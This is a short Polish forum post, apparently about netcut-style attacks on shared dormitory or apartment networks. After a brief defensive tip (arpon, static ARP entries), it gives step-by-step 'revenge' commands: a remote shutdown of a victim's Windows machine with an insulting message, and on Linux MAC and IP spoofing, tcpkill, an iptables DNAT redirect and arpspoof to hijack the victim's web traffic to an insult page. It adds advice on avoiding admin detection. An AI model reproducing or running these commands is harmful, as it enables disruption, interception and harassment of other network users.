Odkopane ale jakby ktos nie wiedzial:
http://arpon.sourceforge.net/ uniemozliwia dzialanie netcut'a.
albo ustawic statyczna tablice arp:
start > uruchom > cmd
arp -s nasze_ip nasz_mac
zemsta jest slodka (w cmd):
shutdown -m ip_lamusa -s -t 5 -c "jestes cipa i tyle!"
na linuxie:
ifconfig eth0 down
macchanger -m fake_mac eth0
// lub random // macchanger -r eth0
// lub // ifconfig eth0 hw ether fake_mac (aby umozliwic dublowanie istniejacego juz ip+mac w sieci musimy rozlaczyc np. tcpkillem polaczenia ESTABLISHED,NEW docelowego komputera na portach udp 53,67,68 dla ipv4)
ifconfig eth0 fake_ip netmask maska_sieci up
apt-get install apache2
a2enmod rewrite
/etc/init.d/apache2 restart
echo "Jestes cipa i tyle!" > /var/www/index.php
echo "RewriteEngine on" > /var/www/.htaccess
echo "RewriteCond %{REQUEST_FILENAME} !-d" >> /var/www/.htaccess
echo "RewriteCond %{REQUEST_FILENAME} !-f" >> /var/www/.htaccess
echo "RewriteRule . index.php [L]" >> /var/www/.htaccess
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -s ip_lamusa -p tcp --dport 20: -j DNAT --to-destination fake_ip:80
arpspoof -i eth0 -t ip_lamusa ip_bramy
Ps. nie jestesmy w 100 % anonimowi, jezeli administrator dysponuje odpowiednim sprzetem sieciowym switche, vlany przelaczniki i sterta innych odpowiednio skonfigurowanych ******* to moze sprawdzic w logach z ktorego vlana modyfikowalismy wpisy arp itp itd.... na szczescie wiekszosc osiedlowych/akademickich adminow to pojeby